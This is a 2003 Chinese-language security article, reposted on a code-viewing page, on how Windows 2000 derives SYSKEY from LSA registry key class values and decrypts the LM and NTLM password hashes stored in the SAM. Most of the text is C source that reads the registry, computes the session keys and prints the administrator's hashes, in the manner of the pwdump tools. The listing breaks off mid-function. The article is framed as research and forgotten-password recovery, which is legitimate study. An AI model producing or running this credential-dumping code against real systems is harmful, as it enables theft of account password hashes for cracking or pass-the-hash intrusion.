?? sam的散列存儲加密解密算法.txt
字號:
SAM的散列存儲加密解密算法以及SYSKEY的計算
創(chuàng)建時間:2003-06-04
文章屬性:原創(chuàng)
文章提交:flashsky (flashsky1_at_sina.com)
SAM的散列存儲加密解密算法以及SYSKEY的計算
轉(zhuǎn)摘請注明作者和安全焦點
作者:FLASHSKY
SITE:WWW.XFOCUS.NET,WWW.SHOPSKY.COM
郵件:flashsky@xfocus.org
作者單位:啟明星辰積極防御實驗室
SAM中存放在密碼散列這是大家都知道的,但是其密碼存放在對應相對SID的V鍵下面卻是一種加密的形式,如何通過這個加密的串計算出密碼散列了,大家用PWDUMP3這樣的工具可以導出散列來,主要原理是系統(tǒng)空間會存在一個sampsecretsessionkey,PWDUMP3就是拷貝一個服務(wù)到對方機器上,讀出這個lsass進程空間的sampsecretsessionkey再進行解密的,其實這個sampsecretsessionkey的生成也是非常復
雜的,我們這里做一個比PWDUMP3更深入的一個探討和分析,sampsecretsessionkey的計算與生成,這樣我們就能在直接從物理文件中計算出sampsecretsessionkey,來解密注冊表中的密碼散列,對于一個忘記密碼的系統(tǒng)或一個不知道用戶口令但已經(jīng)獲得磁盤的系統(tǒng)有這重要意義,這樣我們完全就能通過注冊表文件的分析來解密注冊表中的密碼散列。
通過分析,我們發(fā)現(xiàn)以前在NT中常說的SYSKEY在W2K系統(tǒng)的這個過程中起著非常重要的作用,其實SYSKEY已經(jīng)做為W2K的一個固定組件而存在了,我們下面給出一個整個過程:
系統(tǒng)引導時:
計算獲得SYSKEY
讀取注冊表中的SAM\SAM\Domains\Accoun\V中保存的KEY信息(一般是最后的0X38字節(jié)的前0X30字節(jié))
使用SYSKEY和F鍵的前0X10字節(jié),與特殊的字串"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%","0123456789012345678901234567890123456789"做MD5運算,再與F鍵的后0X20字節(jié)做RC4運算就可以獲得sampsecretsessionkey,這個
sampsecretsessionkey固定存放在LSASS進程中,作為解密SAM中加密數(shù)據(jù)到散列時用
-------------------------------------------------
|系統(tǒng)計算出的SYSKEY |
|F鍵信息的前0x10字節(jié) |MD5
|"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%"|--->------
|"0123456789012345678901234567890123456789" | |RC4
-------------------------------------------------- |------>sampsecretsessionkey
|
F鍵信息的后0x20字節(jié) -------------------
當需要解密SAM中加密數(shù)據(jù)到散列時(如遠程登陸):
讀取sampsecretsessionkey,再與當前用戶的相對SID,散列類型名(如LMPASSWORD,NTPASSWORD)做MD5運算獲得針對這個用戶密碼散列的sessionkey
利用sessionkey用RC4解密第一道加密的散列,再將用戶相對ID擴展成14字節(jié)做DES切分,生成DESECB,再對用RC4處理后的散列進行分開成2次DES解密就可以獲得密碼散列。
-------------------------
|sampsecretsessionkey |
|sid |MD5
|"LMPASSWOR"/"NTPASSWOR"|--->sessionkey---
| | |RC4 2次DES(填充SID做KEY切分)
------------------------- |----->-------------------------->HASH
|
對應的SAM中加密的密碼散列 ---------------------------------
這個算法相當好,保證了不同用戶的相同散列在SAM存放不一樣(相對SID不一樣),不同機器的同一SID同口令的SAM中的散列存放不一樣(SYSKEY不同);
這個算法的DES/RC4都是可逆的,這樣如果我們能通過離線(文件)方式獲得SYSKEY的話(其他的信息都可以分析SAM文件獲得),我們完全實現(xiàn)離線修改SAM中口令的效果,不過這需要對注冊表的結(jié)構(gòu)和SAM中V/F鍵的數(shù)據(jù)結(jié)構(gòu)再做深入的研究,這里就不談了。
那么SYSKEY是如何計算出來的呢?這可能是我發(fā)現(xiàn)MS最牛皮的一個地方了,先開始想一定會存放在注冊表某處,呵呵,最后跟蹤MS引導時候的WINLOGON進程才知道,SYSKEY是這樣計算出來的,很多人會大掉眼鏡吧:
SYSKEY的計算是:SYSTEM\\CurrentControlSet\\Control\\Lsa下的
JD,Skew1,GBG,Data四個鍵值的CLASS值通過換位得來的,靠,佩服MS。這樣我們完全可以離線分析注冊表就能獲得對其SAM的加密散列的導出或改寫了。
下面就是給出的完全實現(xiàn)計算SYSKEY-》sampsecretsessionkey,對特定用戶的SAM中加密的密碼散列再解密的代碼:當然如果從運行系統(tǒng)中解密散列也可以直接讀取sampsecretsessionkey,就象PWDUMP3那樣做的一樣也是可以的,但是如果要實現(xiàn)離線的就還需要再分析更多的東西。
另外關(guān)于PWDUMP具體的方法,由于其是加密和反跟蹤的,我沒時間做仔細調(diào)式分析,但是從REGMON監(jiān)視其注冊表操作的過程來說,是沒有去讀LSA下的任何東西的,因此可以斷定他是直接獲得ampsecretsessionkey來進行對SAM內(nèi)容的解密到散列的。
//下面幾個函數(shù)的實現(xiàn),DES相關(guān)的盒,ECB等的定義參考我以前發(fā)的文章 中的代碼,這里不再給出
//void deskey(char * LmPass,unsigned char * desecb)
//void rc4_key(unsigned char * rc4keylist,unsigned char * rc4key,int keylen);
//void md5init(unsigned char * LM);
//void md5final(unsigned char * LM);
//void initLMP(char * pass,unsigned char * LM);
//以前給出的des函數(shù)的實現(xiàn)沒有解密的部分,并且有個小錯誤,因此這里再給出完整的一個
#include <stdio.h>
#include <windows.h>
#include "des.h"
void getsyskey(unsigned char * syskey);
void getsampsecretsessionkey(unsigned char * syskey,unsigned char * fkey);
void md5init(unsigned char * LM);
void md5final(unsigned char * LM);
void rc4_key(unsigned char * rc4keylist,unsigned char * rc4key,int keylen);
void rc4_2bc6(unsigned char * rc4keylist,int keylen,unsigned char * key);
void getsamkey(unsigned char * sampsskey,unsigned char * uid,unsigned char * passwordtype,unsigned char * sessionkey);
void getsamhash(unsigned char * ensaminfo,unsigned char * sessionkey,unsigned char * uid);
void initLMP(char * pass,unsigned char * LM);
void deskey(char * LmPass,unsigned char * desecb);
void des(unsigned char * LM,char * magic,unsigned char * ecb,long no);
void main()
{
int i;
//下面為了簡單,這3個是直接指定的用戶,相對SID的注冊表鍵名和相對SID,大家也可以寫成完全根據(jù)用戶名獲取的方式
char username[]="SAM\\SAM\\Domains\\Account\\Users\\Names\\administrator";
char keyname[]="SAM\\SAM\\Domains\\Account\\Users\\000001F4";
unsigned long uid=0x1F4;
unsigned char syskey[0x10];
unsigned char ensamnt[0x10];
unsigned char ensamlm[0x10];
unsigned char sessionkey[0x10];
unsigned char buf[0x400];
unsigned char sampsecretsessionkey[0x10];
unsigned char lmhash[0x10];
unsigned char nthash[0x10];
unsigned char fkey[0x30];
unsigned long ss;
DWORD regtype;
DWORD regint;
unsigned char passwordtype[5][100]={"LMPASSWORD","NTPASSWORD","LMPASSWORDHISTORY","NTPASSWORDHISTORY","MISCCREDDATA"};
HKEY hkResult;
HKEY hkResult1;
//SAM中的鍵讀取先要提升自己成為LOCASYSTEM權(quán)限,這里并沒有實現(xiàn),自己增加其中的代碼
//讀出F鍵中用于計算
regint=0x400;
ss=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SAM\\SAM\\Domains\\Account",0,KEY_READ,&hkResult);
if(ss!=0)
printf("no Privilege!\n");
ss=RegQueryValueEx(hkResult,"F", NULL,®type,buf,®int);
for(i=regint-1;i>=0;i--)
if(buf[i]!=0)
break;
memcpy(fkey,buf+i-0x2f,0x30);
ss=RegOpenKeyEx(HKEY_LOCAL_MACHINE,username,0,KEY_READ,&hkResult);
//檢查此用戶是否存在
if(ss!=ERROR_SUCCESS)
return;
//讀取該用戶下的V鍵中加密的散列信息
//由于目前還未解析V中的結(jié)構(gòu),我們就直接讀最后的那一串,一般都是如此存放在此
//但也不排除例外,那就需要具體分析V中的結(jié)構(gòu)來計算了
regint=0x400;
ss=RegOpenKeyEx(HKEY_LOCAL_MACHINE,keyname,0,KEY_READ,&hkResult);
ss=RegQueryValueEx(hkResult,"V", NULL,®type,buf,®int);
memcpy(ensamnt,buf+regint-0x18,0x10);
memcpy(ensamlm,buf+regint-0x2c,0x10);
//計算SYSKEY,W2K系統(tǒng)默認SYSKEY使用,且成為其固定的一個組件
getsyskey(syskey);
//利用SYSKEY,F(xiàn)鍵中的KEY計算sampsecretsessionkey
getsampsecretsessionkey(syskey,fkey);
memcpy(sampsecretsessionkey,fkey+0x10,0x10);
//上面的就是系統(tǒng)引導時完成的工作,這個sampsecretsessionkey固定保存在LSASS的進程空間內(nèi)
//當認證等或如PWDUMP3工作時候,就是先從系統(tǒng)中直接讀sampsecretsessionkey再進行處理
//根據(jù)具體用戶的相對SID,要恢復散列的散列類型,生成SESSIONKEY,如下面就是針對LM散列的
getsamkey(sampsecretsessionkey,&uid,passwordtype[0],sessionkey);
memcpy(lmhash,ensamlm,0x10);
//利用SESSIONKEY,SAM中加密的LM散列,相對SID做RC4/DES解密獲得真正的散列
getsamhash(lmhash,sessionkey,&uid);
printf("HASH::");
for(i=0;i<0x10;i++)
printf("%02x",lmhash[i]);
printf(":");
//根據(jù)具體用戶的相對SID,要恢復散列的散列類型,生成SESSIONKEY,如下面就是針對NTLM散列的
getsamkey(sampsecretsessionkey,&uid,passwordtype[1],sessionkey);
memcpy(nthash,ensamnt,0x10);
//利用SESSIONKEY,SAM中加密的NTLM散列,相對SID做RC4/DES解密獲得真正的散列
getsamhash(nthash,sessionkey,&uid);
for(i=0;i<0x10;i++)
printf("%02x",nthash[i]);
printf("\n");
}
void getsamhash(unsigned char * ensaminfo,unsigned char * sessionkey,unsigned char * uid)
{
//利用SESSIONKEY,SAM中加密的LM散列,相對SID做RC4/DES解密獲得真正的散列
unsigned char desecb[128];
unsigned char rc4keylist[0x102];
unsigned char LM[0x10];
unsigned char p1[0xe];
unsigned char p2[0x10];
memcpy(p1,uid,4);
memcpy(p1+4,uid,4);
memcpy(p1+8,uid,4);
memcpy(p1+0xc,uid,2);
//上面是用SID填充DESECB的KEY
rc4_key(rc4keylist,sessionkey,0x10);
rc4_2bc6(rc4keylist,0x10,ensaminfo);
//RC4處理一次再用DES解密
initLMP(p1,LM);
deskey(LM,desecb);
des(p2,ensaminfo,desecb,0);
initLMP(p1+7,LM);
deskey(LM,desecb);
des(p2+8,ensaminfo+8,desecb,0);
memcpy(ensaminfo,p2,0x10);
}
void getsamkey(unsigned char * sampsskey,unsigned long * uid,unsigned char * passwordtype,unsigned char * sessionkey)
{
//根據(jù)具體用戶的相對SID,要恢復散列的散列類型,MD5生成SESSIONKEY
unsigned char LM[0x58];
int len,i;
md5init(LM);
for(i=0;i<20;i++)
if(passwordtype[i]==0)
break;
len=i+1;
memcpy(LM+0x18,sampsskey,0x10);
memcpy(LM+0x28,(unsigned char *)uid,4);
memcpy(LM+0x2c,passwordtype,len);
memset(LM+0x2c+len,0x80,1);
memset(LM+0x2c+len+1,0x0,0x58-(0x2c+len+1));
*(DWORD *)LM=0x200;
*(DWORD *)(LM+0X50)=0xF8;
md5final(LM);
memcpy(sessionkey,LM+8,0x10);
}
void getsyskey(unsigned char * syskey)
{
unsigned char keyselect[]={0x8,0xA,0x3,0x7,0x2,0x1,0x9,0xF,
0x0,0x5,0xd,0x4,0xb,0x6,0xc,0xe};
//換位表
unsigned char syskey1[0x10];
HKEY hkResult;
HKEY hkResult1;
int i,j;
long ss;
unsigned char classinfo[0x10];
DWORD c1;
ss=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Lsa",0,KEY_READ,&hkResult);
if(ss!=ERROR_SUCCESS)
return;
ss=RegOpenKeyEx(hkResult,"JD",0,KEY_READ,&hkResult1);
i=0;
memset(syskey1,0,0x10);
c1=0x10;
if(ss==ERROR_SUCCESS)
{
ss=RegQueryInfoKey(hkResult1,classinfo,&c1,0,0,0,0,0,0,0,0,0);
RegCloseKey(hkResult1);
if(ss==ERROR_SUCCESS)
{
printf("%s\n",classinfo);
for(j=0;j<8;j++)
{
if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
classinfo[j]=classinfo[j]-0x30;
else if(classinfo[j]>='a' && classinfo[j]<='f')
classinfo[j]=classinfo[j]-'a'+0xa;
else if(classinfo[j]>='A' && classinfo[j]<='F')
classinfo[j]=classinfo[j]-'A'+0xa;
else
return;
}
syskey1[i+0]=16*classinfo[0]+classinfo[1];
syskey1[i+1]=16*classinfo[2]+classinfo[3];
syskey1[i+2]=16*classinfo[4]+classinfo[5];
syskey1[i+3]=16*classinfo[6]+classinfo[7];
i=i+4;
}
}
c1=0x10;
ss=RegOpenKeyEx(hkResult,"Skew1",0,KEY_READ,&hkResult1);
if(ss==ERROR_SUCCESS)
{
ss=RegQueryInfoKey(hkResult1,classinfo,&c1,0,0,0,0,0,0,0,0,0);
RegCloseKey(hkResult1);
if(ss==ERROR_SUCCESS)
{
printf("%s\n",classinfo);
for(j=0;j<8;j++)
{
if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
classinfo[j]=classinfo[j]-0x30;
else if(classinfo[j]>='a' && classinfo[j]<='f')
classinfo[j]=classinfo[j]-'a'+0xa;
else if(classinfo[j]>='A' && classinfo[j]<='F')
classinfo[j]=classinfo[j]-'A'+0xa;
else
return;
}
syskey1[i+0]=16*classinfo[0]+classinfo[1];
syskey1[i+1]=16*classinfo[2]+classinfo[3];
syskey1[i+2]=16*classinfo[4]+classinfo[5];
syskey1[i+3]=16*classinfo[6]+classinfo[7];
i=i+4;
}
}
c1=0x10;
ss=RegOpenKeyEx(hkResult,"GBG",0,KEY_READ,&hkResult1);
if(ss==ERROR_SUCCESS)
{
ss=RegQueryInfoKey(hkResult1,classinfo,&c1,0,0,0,0,0,0,0,0,0);
RegCloseKey(hkResult1);
if(ss==ERROR_SUCCESS)
{
printf("%s\n",classinfo);
for(j=0;j<8;j++)
{
if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
classinfo[j]=classinfo[j]-0x30;
else if(classinfo[j]>='a' && classinfo[j]<='f')
classinfo[j]=classinfo[j]-'a'+0xa;
else if(classinfo[j]>='A' && classinfo[j]<='F')
classinfo[j]=classinfo[j]-'A'+0xa;
else
return;
}
syskey1[i+0]=16*classinfo[0]+classinfo[1];
syskey1[i+1]=16*classinfo[2]+classinfo[3];
syskey1[i+2]=16*classinfo[4]+classinfo[5];
syskey1[i+3]=16*classinfo[6]+classinfo[7];
i=i+4;
}
}
c1=0x10;
ss=RegOpenKeyEx(hkResult,"Data",0,KEY_READ,&hkResult1);
if(ss==ERROR_SUCCESS)
{
ss=RegQueryInfoKey(hkResult1,classinfo,&c1,0,0,0,0,0,0,0,0,0);
RegCloseKey(hkResult1);
if(ss==ERROR_SUCCESS)
{
printf("%s\n",classinfo);
for(j=0;j<8;j++)
{
if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
classinfo[j]=classinfo[j]-0x30;
else if(classinfo[j]>='a' && classinfo[j]<='f')
classinfo[j]=classinfo[j]-'a'+0xa;
else if(classinfo[j]>='A' && classinfo[j]<='F')
classinfo[j]=classinfo[j]-'A'+0xa;
else
return;
}
syskey1[i+0]=16*classinfo[0]+classinfo[1];
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -